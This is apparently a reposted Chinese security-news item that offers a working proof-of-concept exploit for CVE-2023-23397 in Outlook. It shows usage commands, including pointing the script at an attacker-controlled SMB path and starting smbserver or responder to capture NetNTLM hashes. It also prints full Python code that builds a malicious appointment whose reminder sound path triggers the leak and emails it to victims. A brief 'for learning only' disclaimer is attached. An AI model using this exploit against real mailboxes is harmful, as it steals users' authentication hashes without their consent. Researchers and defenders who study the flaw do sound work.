漏洞速递 | CVE-2023-23397(附EXP)
制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。https://github.com/Trackflaw/CVE-2 2023-3-31 08:2:56 Author: EchoSec(查看原文) 阅读量:71 收藏

        制作了一个简单的 PoC 电子邮件生成器和发件人,具有恶意提醒功能(只是一条消息,无需使用任务或 Cal.Ev.)。

https://github.com/Trackflaw/CVE-2023-23397/blob/main/poc.gif

In one session :

python CVE-2023-23397.py
usage: CVE-2023-23397.py [-h] -p PATHCVE-2023-23397.py: error: the following arguments are required: -p/--path
python CVE-2023-23397.py --path '\\yourip\'
In a second session (smbserver or responder as you want).
smbserver.py -smb2support SHARE .

import smtplib, datetime, argparsefrom email.mime.multipart import MIMEMultipartfrom email.mime.text import MIMETextfrom email.mime.application import MIMEApplicationfrom email.utils import COMMASPACE, formatdatefrom independentsoft.msg import Message
# Mail configuration : change it !smtp_server = "mail.example.com"smtp_port = 587
sender_email = "[email protected]"sender_password = "[email protected]"
recipients_email = ["[email protected]"]
class Email:    def __init__(self, smtp_server, port, username, password, recipient):        self.smtp_server = smtp_server        self.port = port        self.username = username        self.password = password        self.recipient = recipient
    def send(self, subject, body, attachment_path):        msg = MIMEMultipart()        msg['From'] = self.username        msg['To'] = COMMASPACE.join(self.recipient)        msg['Date'] = formatdate(localtime=True)        msg['Subject'] = subject                msg.attach(MIMEText(body))
        with open(attachment_path, 'rb') as f:            part = MIMEApplication(f.read(), Name=attachment_path)            part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'            msg.attach(part)
        try:            server = smtplib.SMTP(self.smtp_server, self.port)            server.starttls()            server.login(self.username, self.password)            server.sendmail(self.username, self.recipient, msg.as_string())            server.quit()            print("[+] Malicious appointment sent !")

        except Exception as e:            print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)args = parser.parse_args()
appointment = Message()appointment.message_class = "IPM.Appointment"appointment.subject = "CVE-2023-23397"appointment.body = "New meeting now !"appointment.location = "Paris"appointment.appointment_start_time = datetime.datetime.now()appointment.appointment_end_time = datetime.datetime.now()appointment.reminder_override_default = Trueappointment.reminder_sound_file = args.pathappointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"body = "Important appointment !"email.send(subject, body, "appointment.msg")
文章来源:Khan安全攻防实验室
​仅用于学习交流,不得用于非法用途
如侵权请私聊公众号删文

                    


                    

                        文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247487337&idx=1&sn=6bbef13b7d8fa31122393d2c9c999f88&chksm=fcdf5376cba8da603b622be1c13b6dfaed23c6f8bf6c3b26d1e8b6718e7b440bb1b748dfa20d#rd
 如有侵权请联系:admin#unsafe.sh